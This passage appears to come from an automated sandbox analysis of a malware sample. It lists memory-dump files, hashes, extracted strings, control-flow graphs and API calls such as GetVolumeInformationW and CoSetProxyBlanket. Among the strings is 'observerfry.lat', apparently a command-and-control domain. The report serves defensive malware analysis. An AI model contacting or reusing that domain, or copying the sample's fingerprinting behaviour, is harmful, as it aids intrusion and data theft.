                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: $!$"$#$%$%$%$&$&$'$)$*$+$-$-$.$.$/$/$/$/$0$1$1$2$2$3$3$5$6$7$8$9$9$9$:$;$;$;$<$<$<$=$=$=$?$?$@$A$A$B$C$D$D$D$D$E$E$F$F$G$H$J$K$K$L$L$N$O$Q$R$S$S$U$V$W$X$X$Y$Y$Z$[$\$\$\$\$\$\$\$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$`$a$a$c$d$d$e$e$f$g$h$i$i$j$j$k$k$l$l$m$m$n$o$o$q$r$s$u$v$w$y$y${$|$}$~$~
                                                                                                                                                                • API String ID: 0-1985396431
                                                                                                                                                                • Opcode ID: e52975491a40eacf83306e7afdb0a1403b7b06850df3a4b698cec80a15bf4bc4
                                                                                                                                                                • Instruction ID: fd0df879c6591dba4df889ce3ba4b81cae120300a6980f060aa26229da5ef906
                                                                                                                                                                • Opcode Fuzzy Hash: e52975491a40eacf83306e7afdb0a1403b7b06850df3a4b698cec80a15bf4bc4
                                                                                                                                                                • Instruction Fuzzy Hash: 7413AD7150C7C08BD3259B3884443AFBFE1ABD6314F198E6EE4E987382D6B98945CB53
                                                                                                                                                                Function 009E2E6D Relevance: 48.8, APIs: 3, Strings: 24, Instructions: 1505COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: #E#G$%"$+A#C$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$observerfry.lat$s$wdnf$~SS}$rp
                                                                                                                                                                • API String ID: 0-3004701125
                                                                                                                                                                • Opcode ID: 50ea8ce02347f7e6514a427454033256e597c80a4618eb5ca76af553ac7cabf3
                                                                                                                                                                • Instruction ID: f2da15b4e0a8a9e019cf4fbdef67d10b98e4a5215ea51038666ec1ea25543efa
                                                                                                                                                                • Opcode Fuzzy Hash: 50ea8ce02347f7e6514a427454033256e597c80a4618eb5ca76af553ac7cabf3
                                                                                                                                                                • Instruction Fuzzy Hash: 01B212B1A08345CFD714CF69C8917ABBBA2FF85314F198A6CE4859B391D7389D02CB91
                                                                                                                                                                Function 009D58D5 Relevance: 29.6, APIs: 1, Strings: 15, Instructions: 1631COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                • API String ID: 0-510280711
                                                                                                                                                                • Opcode ID: b6ac8a3892e5cda5dc2e8ecc0ebf6b050ed2961578042101524f3812b885773f
                                                                                                                                                                • Instruction ID: df6f8bd15e5820b809301de4c9faa4a89a39d80573b6936d24e95c245f5cdfb3
                                                                                                                                                                • Opcode Fuzzy Hash: b6ac8a3892e5cda5dc2e8ecc0ebf6b050ed2961578042101524f3812b885773f
                                                                                                                                                                • Instruction Fuzzy Hash: CDB204B1A083408FD724CF28D8917ABB7E6EFD5314F19892DE4C98B392D7359806CB52
                                                                                                                                                                Function 009E1D00 Relevance: 26.8, Strings: 21, Instructions: 506COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1019 9e1d00-9e1d48 call a01320 1022 9e1d4e-9e1db8 call 9d4c70 call 9fc540 1019->1022 1023 9e2449-9e2459 1019->1023 1028 9e1dba-9e1dbd 1022->1028 1029 9e1dbf-9e1dd4 1028->1029 1030 9e1dd6-9e1dda 1028->1030 1029->1028 1031 9e1ddc-9e1de7 1030->1031 1032 9e1dee-9e1e05 1031->1032 1033 9e1de9 1031->1033 1035 9e1e0c-9e1e17 1032->1035 1036 9e1e07-9e1e95 1032->1036 1034 9e1ea8-9e1eab 1033->1034 1040 9e1eaf-9e1eb4 1034->1040 1041 9e1ead 1034->1041 1038 9e1e19-9e1e89 call 9fe110 1035->1038 1039 9e1e97-9e1e9c 1035->1039 1036->1039 1049 9e1e8e-9e1e93 1038->1049 1045 9e1e9e 1039->1045 1046 9e1ea0-9e1ea3 1039->1046 1042 9e1eba-9e1eca 1040->1042 1043 9e2392-9e23c7 call 9fc570 1040->1043 1041->1040 1047 9e1ecc-9e1ee9 1042->1047 1054 9e23c9-9e23cc 1043->1054 1045->1034 1046->1031 1050 9e1eef-9e1f13 1047->1050 1051 9e207b-9e2083 1047->1051 1049->1039 1053 9e1f17-9e1f1a 1050->1053 1055 9e2085-9e2088 1051->1055 1056 9e1f1c-9e1f31 1053->1056 1057 9e1f33-9e1f4d call 9e2460 1053->1057 1058 9e23ce-9e23e3 1054->1058 1059 9e23e5-9e23eb 1054->1059 1060 9e208a-9e208e 1055->1060 1061 9e2090-9e20a1 call 9fc540 1055->1061 1056->1053 1057->1051 1075 9e1f53-9e1f7c 1057->1075 1058->1054 1063 9e23ed-9e23f3 1059->1063 1064 9e20b5-9e20b7 1060->1064 1072 9e20a3-9e20ac 1061->1072 1073 9e20b1-9e20b3 1061->1073 1070 9e23f7-9e2409 1063->1070 1071 9e23f5 1063->1071 1067 9e20bd-9e20e0 1064->1067 1068 9e2358-9e2363 1064->1068 1074 9e20e2-9e20e5 1067->1074 1076 9e2367-9e236f 1068->1076 1077 9e2365-9e2375 1068->1077 1079 9e240d-9e2413 1070->1079 1080 9e240b 1070->1080 1078 9e2447 1071->1078 1081 9e2379-9e237d 1072->1081 1073->1064 1082 9e211a-9e2157 1074->1082 1083 9e20e7-9e2118 1074->1083 1084 9e1f7e-9e1f81 1075->1084 1086 9e2377 1076->1086 1077->1086 1078->1023 1087 9e243b-9e243e 1079->1087 1088 9e2415-9e2437 call 9fe110 1079->1088 1080->1087 1081->1047 1089 9e2383-9e2388 1081->1089 1093 9e215b-9e215e 1082->1093 1083->1074 1094 9e1fae-9e1fc5 call 9e2460 1084->1094 1095 9e1f83-9e1fac 1084->1095 1086->1081 1091 9e2442-9e2445 1087->1091 1092 9e2440 1087->1092 1088->1087 1101 9e238e-9e2390 1089->1101 1102 9e245a 1089->1102 1091->1063 1092->1078 1098 9e2177-9e217f 1093->1098 1099 9e2160-9e2175 1093->1099 1108 9e1fc7-9e1fcf 1094->1108 1109 9e1fd4-9e1feb 1094->1109 1095->1084 1103 9e2181-9e218c 1098->1103 1099->1093 1101->1043 1106 9e218e 1103->1106 1107 9e2193-9e21aa 1103->1107 1112 9e2259-9e2260 1106->1112 1113 9e21ac-9e2246 1107->1113 1114 9e21b1-9e21be 1107->1114 1108->1055 1110 9e1fef-9e2079 call 9c7f50 call 9d48c0 call 9c7f60 1109->1110 1111 9e1fed 1109->1111 1110->1055 1111->1110 1118 9e2266-9e2289 1112->1118 1119 9e2262 1112->1119 1115 9e2248-9e224d 1113->1115 1114->1115 1116 9e21c4-9e223a call 9fe110 1114->1116 1123 9e224f 1115->1123 1124 9e2251-9e2254 1115->1124 1126 9e223f-9e2244 1116->1126 1125 9e228b-9e228e 1118->1125 1119->1118 1123->1112 1124->1103 1128 9e22ed-9e2301 1125->1128 1129 9e2290-9e22eb 1125->1129 1126->1115 1131 9e2333-9e2336 1128->1131 1132 9e2303-9e2307 1128->1132 1129->1125 1133 9e2338-9e2345 call 9fc570 1131->1133 1134 9e2347-9e2349 1131->1134 1135 9e2309-9e2310 1132->1135 1137 9e234b-9e234e 1133->1137 1134->1137 1139 9e2312-9e231e 1135->1139 1140 9e2320-9e2323 1135->1140 1137->1068 1144 9e2350-9e2356 1137->1144 1139->1135 1141 9e232b-9e2331 1140->1141 1142 9e2325 1140->1142 1141->1131 1142->1141 1144->1081
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
                                                                                                                                                                • API String ID: 0-1565257739
                                                                                                                                                                • Opcode ID: afd81ae666a895e93d4afcae245904206b5414cf951959020f8c2c95abb3565c
                                                                                                                                                                • Instruction ID: 827d45a680cbc43ef99d243c2227dc308f586a60678d0259686b8c4f5ed5b90f
                                                                                                                                                                • Opcode Fuzzy Hash: afd81ae666a895e93d4afcae245904206b5414cf951959020f8c2c95abb3565c
                                                                                                                                                                • Instruction Fuzzy Hash: 5A228B7150C7C08FD3268B29C48176FBBE5AB85314F184D6DE5EA87392D7BA8885CB43
                                                                                                                                                                Function 009F9280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1147 9f9280-9f92a4 1148 9f92b0-9f92d7 1147->1148 1148->1148 1149 9f92d9-9f92ef 1148->1149 1150 9f92f0-9f9322 1149->1150 1150->1150 1151 9f9324-9f936a 1150->1151 1152 9f9370-9f938c 1151->1152 1152->1152 1153 9f938e-9f93a7 1152->1153 1155 9f93ad-9f93b6 1153->1155 1156 9f942a-9f9435 1153->1156 1158 9f93c0-9f93d9 1155->1158 1157 9f9440-9f947b 1156->1157 1157->1157 1159 9f947d-9f94de 1157->1159 1158->1158 1160 9f93db-9f93ee 1158->1160 1164 9f9906-9f9932 call 9ffe00 GetVolumeInformationW 1159->1164 1165 9f94e4-9f9515 1159->1165 1161 9f93f0-9f941e 1160->1161 1161->1161 1163 9f9420-9f9425 1161->1163 1163->1156 1170 9f993c-9f993e 1164->1170 1171 9f9934-9f9938 1164->1171 1167 9f9520-9f954d 1165->1167 1167->1167 1169 9f954f-9f9576 SysAllocString 1167->1169 1174 9f957c-9f9596 CoSetProxyBlanket 1169->1174 1175 9f98f5-9f9902 1169->1175 1173 9f9950-9f9957 1170->1173 1171->1170 1176 9f9959-9f9960 1173->1176 1177 9f9970-9f998f 1173->1177 1178 9f959c-9f95b4 1174->1178 1179 9f98eb-9f98f1 1174->1179 1175->1164 1176->1177 1180 9f9962-9f996e 1176->1180 1181 9f9990-9f99b2 1177->1181 1184 9f95c0-9f961e 1178->1184 1179->1175 1180->1177 1181->1181 1182 9f99b4-9f99ca 1181->1182 1185 9f99d0-9f9a06 1182->1185 1184->1184 1186 9f9620-9f969f 1184->1186 1185->1185 1187 9f9a08-9f9a2e call 9de960 1185->1187 1190 9f96a0-9f96ff 1186->1190 1193 9f9a30-9f9a37 1187->1193 1190->1190 1192 9f9701-9f972d 1190->1192 1202 9f98d6-9f98e7 SysFreeString * 2 1192->1202 1203 9f9733-9f9755 1192->1203 1193->1193 1194 9f9a39-9f9a4c 1193->1194 1196 9f9a52-9f9a65 call 9c7fd0 1194->1196 1197 9f9940-9f994a 1194->1197 1196->1197 1197->1173 1199 9f9a6a-9f9a71 1197->1199 1202->1179 1205 9f98cc-9f98d2 1203->1205 1206 9f975b-9f975e 1203->1206 1205->1202 1206->1205 1207 9f9764-9f9769 1206->1207 1207->1205 1208 9f976f-9f97b7 1207->1208 1210 9f97c0-9f97d4 1208->1210 1210->1210 1211 9f97d6-9f97e0 1210->1211 1212 9f97e4-9f97e6 1211->1212 1213 9f97ec-9f97f2 1212->1213 1214 9f98bb-9f98c8 1212->1214 1213->1214 1215 9f97f8-9f9806 1213->1215 1214->1205 1216 9f983d 1215->1216 1217 9f9808-9f980d 1215->1217 1220 9f983f-9f9877 call 9c7f50 call 9c8e10 1216->1220 1219 9f981c-9f9820 1217->1219 1221 9f9822-9f982b 1219->1221 1222 9f9810 1219->1222 1231 9f9879-9f988f 1220->1231 1232 9f98a7-9f98b7 call 9c7f60 1220->1232 1225 9f982d-9f9830 1221->1225 1226 9f9832-9f9836 1221->1226 1224 9f9811-9f981a 1222->1224 1224->1219 1224->1220 1225->1224 1226->1224 1229 9f9838-9f983b 1226->1229 1229->1224 1231->1232 1233 9f9891-9f989e 1231->1233 1232->1214 1233->1232 1235 9f98a0-9f98a3 1233->1235 1235->1232
                                                                                                                                                                APIs
                                                                                                                                                                • SysAllocString.OLEAUT32(00001F7A), ref: 009F9550
                                                                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009F958F
                                                                                                                                                                • SysFreeString.OLEAUT32 ref: 009F98DF
                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009F98E5
                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 009F992E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
